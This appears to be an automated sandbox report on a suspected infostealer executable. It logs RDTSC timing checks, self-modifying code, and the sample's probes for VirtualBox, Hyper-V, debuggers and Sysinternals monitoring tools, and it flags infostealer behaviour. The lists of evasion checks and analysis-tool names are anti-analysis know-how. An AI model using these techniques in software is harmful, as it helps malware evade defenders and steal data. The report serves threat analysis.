Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: 6F715BF second address: 6F715E2 instructions: 0x00000000 rdtsc 0x00000002 call 00007F5BD0C7BA79h 0x00000007 pop esi 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c mov cx, di 0x0000000f rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: 6F715E2 second address: 6F71625 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F5BD0FFF0D3h 0x00000008 adc cx, 2E5Eh 0x0000000d jmp 00007F5BD0FFF0D9h 0x00000012 popfd 0x00000013 pop edx 0x00000014 pop eax 0x00000015 popad 0x00000016 mov word ptr [edx+30h], ax 0x0000001a pushad 0x0000001b movzx esi, bx 0x0000001e pushad 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: 6F71625 second address: 6F7167B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5BD0C7BA75h 0x00000009 popad 0x0000000a popad 0x0000000b mov ax, word ptr [esi+32h] 0x0000000f pushad 0x00000010 pushfd 0x00000011 jmp 00007F5BD0C7BA6Ch 0x00000016 adc si, 8CB8h 0x0000001b jmp 00007F5BD0C7BA6Bh 0x00000020 popfd 0x00000021 popad 0x00000022 mov word ptr [edx+32h], ax 0x00000026 push eax 0x00000027 push edx 0x00000028 jmp 00007F5BD0C7BA71h 0x0000002d rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: 6F7167B second address: 6F7173D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F5BD0FFF0D7h 0x00000009 sbb ecx, 441363DEh 0x0000000f jmp 00007F5BD0FFF0D9h 0x00000014 popfd 0x00000015 mov ax, 86A7h 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c mov eax, dword ptr [esi+34h] 0x0000001f jmp 00007F5BD0FFF0CAh 0x00000024 mov dword ptr [edx+34h], eax 0x00000027 jmp 00007F5BD0FFF0D0h 0x0000002c test ecx, 00000700h 0x00000032 pushad 0x00000033 pushfd 0x00000034 jmp 00007F5BD0FFF0CEh 0x00000039 xor ecx, 79B39638h 0x0000003f jmp 00007F5BD0FFF0CBh 0x00000044 popfd 0x00000045 mov bx, si 0x00000048 popad 0x00000049 jne 00007F5C401CD0B4h 0x0000004f pushad 0x00000050 pushad 0x00000051 mov esi, 1A9838BDh 0x00000056 pushad 0x00000057 popad 0x00000058 popad 0x00000059 mov ax, 875Fh 0x0000005d popad 0x0000005e or dword ptr [edx+38h], FFFFFFFFh 0x00000062 jmp 00007F5BD0FFF0D2h 0x00000067 or dword ptr [edx+3Ch], FFFFFFFFh 0x0000006b push eax 0x0000006c push edx 0x0000006d pushad 0x0000006e push eax 0x0000006f push edx 0x00000070 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: 6F7173D second address: 6F71745 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 movsx ebx, cx 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: 6F71745 second address: 6F71786 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushfd 0x00000006 jmp 00007F5BD0FFF0D1h 0x0000000b jmp 00007F5BD0FFF0CBh 0x00000010 popfd 0x00000011 popad 0x00000012 pop edx 0x00000013 pop eax 0x00000014 or dword ptr [edx+40h], FFFFFFFFh 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007F5BD0FFF0D5h 0x0000001f rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: 6F71786 second address: 6F71800 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushfd 0x00000006 jmp 00007F5BD0C7BA6Dh 0x0000000b xor esi, 470548F6h 0x00000011 jmp 00007F5BD0C7BA71h 0x00000016 popfd 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a pop esi 0x0000001b jmp 00007F5BD0C7BA6Eh 0x00000020 pop ebx 0x00000021 pushad 0x00000022 mov ebx, esi 0x00000024 call 00007F5BD0C7BA6Ah 0x00000029 pushfd 0x0000002a jmp 00007F5BD0C7BA72h 0x0000002f sub ax, C478h 0x00000034 jmp 00007F5BD0C7BA6Bh 0x00000039 popfd 0x0000003a pop eax 0x0000003b popad 0x0000003c leave 0x0000003d pushad 0x0000003e mov dx, 3BA8h 0x00000042 pushad 0x00000043 push eax 0x00000044 push edx 0x00000045 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: 6FC0CAE second address: 6FC0CB2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: 6FC0CB2 second address: 6FC0CB8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: 6FC0CB8 second address: 6FC0CC2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov esi, 1AA32061h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: 6FC0CC2 second address: 6FC0CDD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F5BD0C7BA6Fh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: 6FC0CDD second address: 6FC0CE1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: 6FC0CE1 second address: 6FC0CE7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: 6FC0CE7 second address: 6FC0D06 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5BD0FFF0D4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: 6FC0D06 second address: 6FC0D0A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: 6FC0D0A second address: 6FC0D27 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5BD0FFF0D9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: 6FC0D27 second address: 6FC0D63 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx ebx, cx 0x00000006 movzx eax, dx 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov ebp, esp 0x0000000e pushad 0x0000000f jmp 00007F5BD0C7BA71h 0x00000014 pushad 0x00000015 mov cl, 56h 0x00000017 movsx edi, ax 0x0000001a popad 0x0000001b popad 0x0000001c pop ebp 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007F5BD0C7BA71h 0x00000024 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: 6F00055 second address: 6F0005B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: 6F0005B second address: 6F00096 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F5BD0C7BA72h 0x0000000e xchg eax, ebp 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 mov ecx, edi 0x00000014 jmp 00007F5BD0C7BA79h 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: 6F00096 second address: 6F000AB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edi, cx 0x00000006 mov si, F41Fh 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov ebp, esp 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: 6F000AB second address: 6F000AF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: 6F000AF second address: 6F000B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: 6F000B5 second address: 6F000BB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: 6F000BB second address: 6F000BF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: 6F00613 second address: 6F00618 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: 6F00618 second address: 6F00638 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movzx eax, di 0x00000006 call 00007F5BD0FFF0CFh 0x0000000b pop esi 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push ebp 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: 6F00638 second address: 6F0063E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: 6F0063E second address: 6F0067D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5BD0FFF0D8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], ebp 0x0000000c jmp 00007F5BD0FFF0D0h 0x00000011 mov ebp, esp 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007F5BD0FFF0CAh 0x0000001c rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: 6F0067D second address: 6F0068C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5BD0C7BA6Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: 6F0068C second address: 6F00696 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edx, 2B70BC7Ah 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: 6F509D6 second address: 6F509FF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5BD0C7BA6Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F5BD0C7BA75h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: 6F509FF second address: 6F50A25 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5BD0FFF0D1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F5BD0FFF0CDh 0x00000012 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: 6F50A25 second address: 6F50A2C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: 6F50A2C second address: 6F50A39 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pop ebp 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: 6F50A39 second address: 6F50A40 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov edi, eax 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: 6F50A40 second address: 6F50A46 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: 6F50A46 second address: 6F50A4A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: 6F50A4A second address: 6F50A4E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: 6F3007B second address: 6F30122 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5BD0C7BA74h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 sub esp, 44h 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007F5BD0C7BA6Eh 0x00000013 sbb ah, 00000058h 0x00000016 jmp 00007F5BD0C7BA6Bh 0x0000001b popfd 0x0000001c mov edi, eax 0x0000001e popad 0x0000001f xchg eax, ebx 0x00000020 jmp 00007F5BD0C7BA72h 0x00000025 push eax 0x00000026 pushad 0x00000027 mov si, di 0x0000002a pushad 0x0000002b mov edx, 083797CEh 0x00000030 popad 0x00000031 popad 0x00000032 xchg eax, ebx 0x00000033 jmp 00007F5BD0C7BA70h 0x00000038 xchg eax, esi 0x00000039 push eax 0x0000003a push edx 0x0000003b pushad 0x0000003c jmp 00007F5BD0C7BA6Dh 0x00000041 pushfd 0x00000042 jmp 00007F5BD0C7BA70h 0x00000047 jmp 00007F5BD0C7BA75h 0x0000004c popfd 0x0000004d popad 0x0000004e rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: 6F30122 second address: 6F30128 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: 6F30128 second address: 6F3013D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c mov ebx, 6CC52416h 0x00000011 mov ax, di 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: 6F3013D second address: 6F30160 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5BD0FFF0D8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d movzx ecx, bx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: 6F30160 second address: 6F30190 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5BD0C7BA79h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ecx 0x0000000a mov dl, 8Ah 0x0000000c pop esi 0x0000000d popad 0x0000000e push esp 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F5BD0C7BA6Bh 0x00000016 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: 6F30190 second address: 6F301C8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5BD0FFF0D9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], edi 0x0000000c pushad 0x0000000d pushad 0x0000000e mov bh, cl 0x00000010 jmp 00007F5BD0FFF0CFh 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: 6F301C8 second address: 6F301CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: 6F301CC second address: 6F301ED instructions: 0x00000000 rdtsc 0x00000002 mov edi, esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov edi, dword ptr [ebp+08h] 0x0000000a pushad 0x0000000b mov ebx, esi 0x0000000d mov esi, 3E253EFFh 0x00000012 popad 0x00000013 mov dword ptr [esp+24h], 00000000h 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 popad 0x00000021 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: 6F301ED second address: 6F301F1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: 6F301F1 second address: 6F301F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: 6F301F7 second address: 6F30258 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5BD0C7BA76h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 lock bts dword ptr [edi], 00000000h 0x0000000e pushad 0x0000000f jmp 00007F5BD0C7BA6Eh 0x00000014 call 00007F5BD0C7BA72h 0x00000019 call 00007F5BD0C7BA72h 0x0000001e pop eax 0x0000001f pop edi 0x00000020 popad 0x00000021 jc 00007F5C412ADBBDh 0x00000027 push eax 0x00000028 push edx 0x00000029 push eax 0x0000002a push edx 0x0000002b pushad 0x0000002c popad 0x0000002d rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: 6F30258 second address: 6F3025C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: 6F3025C second address: 6F30262 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: 6F60213 second address: 6F6021A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dh, C8h 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: 6F6021A second address: 6F6024A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 xchg eax, ebp 0x00000008 jmp 00007F5BD0C7BA76h 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F5BD0C7BA6Dh 0x00000017 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: 6F6024A second address: 6F6024E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: 6F6024E second address: 6F60254 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Tries to evade debugger and weak emulator (self modifying code)
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeSpecial instruction interceptor: First address: 90E16E instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeCode function: 0_2_003A9980 rdtsc 0_2_003A9980
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeCode function: 0_2_001C255D GetSystemInfo,GlobalMemoryStatusEx,GetDriveTypeA,GetDiskFreeSpaceExA,KiUserCallbackDispatcher,SHGetKnownFolderPath,FindFirstFileW,FindNextFileW,K32EnumProcesses,0_2_001C255D
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeCode function: 0_2_001C29FF FindFirstFileA,RegOpenKeyExA,CharUpperA,CreateToolhelp32Snapshot,QueryFullProcessImageNameA,CloseHandle,CreateToolhelp32Snapshot,CloseHandle,0_2_001C29FF
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeCode function: 0_2_001C255D GetSystemInfo,GlobalMemoryStatusEx,GetDriveTypeA,GetDiskFreeSpaceExA,KiUserCallbackDispatcher,SHGetKnownFolderPath,FindFirstFileW,FindNextFileW,K32EnumProcesses,0_2_001C255D
Source: XJiB3BdLTg.exe, XJiB3BdLTg.exe, 00000000.00000002.1669206620.0000000000A93000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: XJiB3BdLTg.exe, 00000000.00000003.1535109649.000000000723F000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: SYSTEM\ControlSet001\Services\VBoxSF
Source: XJiB3BdLTg.exe, 00000000.00000003.1553812884.0000000001633000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll:
Source: XJiB3BdLTg.exeBinary or memory string: Hyper-V RAW
Source: XJiB3BdLTg.exe, 00000000.00000003.1535109649.000000000723F000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: SYSINTERNALSNum_processorNum_ramnameallfreedriversNum_displaysresolution_xresolution_y\*recent_filesprocessesuptime_minutesC:\Windows\System32\VBox*.dll01vbox_firstSYSTEM\ControlSet001\Services\VBoxSFvbox_secondC:\USERS\PUBLIC\public_checkWINDBG.EXEdbgwireshark.exeprocmon.exex64dbg.exeida.exedbg_secdbg_thirdyadroinstalled_appsSOFTWARE\Microsoft\Windows\CurrentVersion\UninstallSOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall%d%s\%sDisplayNameapp_nameindexCreateToolhelp32Snapshot failed.
Source: XJiB3BdLTg.exe, 00000000.00000003.1555630032.00000000067D1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Y\MACHINE\SYSTEM\ControlSet001\Services\VBoxSFlQ=
Source: XJiB3BdLTg.exe, 00000000.00000002.1669206620.0000000000A93000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: XJiB3BdLTg.exe, 00000000.00000003.1629713995.0000000007101000.00000004.00000020.00020000.00000000.sdmp, XJiB3BdLTg.exe, 00000000.00000002.1672096065.0000000007171000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeSystem information queried: ModuleInformationJump to behavior
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeProcess information queried: ProcessInformationJump to behavior

Anti Debugging

barindex
Hides threads from debuggers
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeThread information set: HideFromDebuggerJump to behavior
Tries to detect sandboxes and other dynamic analysis tools (window names)
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeOpen window title or class name: regmonclass
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeOpen window title or class name: gbdyllo
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeOpen window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeOpen window title or class name: ollydbg
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeOpen window title or class name: filemonclass
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeFile opened: NTICE
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeFile opened: SICE
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeFile opened: SIWVID
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeProcess queried: DebugPortJump to behavior
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeProcess queried: DebugPortJump to behavior
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeProcess queried: DebugPortJump to behavior
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeCode function: 0_2_003A9980 rdtsc 0_2_003A9980
Source: XJiB3BdLTg.exe, 00000000.00000002.1669206620.0000000000A93000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: +Program Manager
Source: XJiB3BdLTg.exeBinary or memory string: +Program Manager
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
Source: XJiB3BdLTg.exe, 00000000.00000002.1668694106.00000000007A0000.00000040.00000001.01000000.00000003.sdmp, XJiB3BdLTg.exe, 00000000.00000003.1535109649.000000000723F000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: procmon.exe
Source: XJiB3BdLTg.exe, 00000000.00000002.1668694106.00000000007A0000.00000040.00000001.01000000.00000003.sdmp, XJiB3BdLTg.exe, 00000000.00000003.1535109649.000000000723F000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: wireshark.exe

Stealing of Sensitive Information

barindex
Infostealer behavior detected
Source: Signature ResultsSignatures: Mutex created, HTTP post and idle behavior
Leaks process information
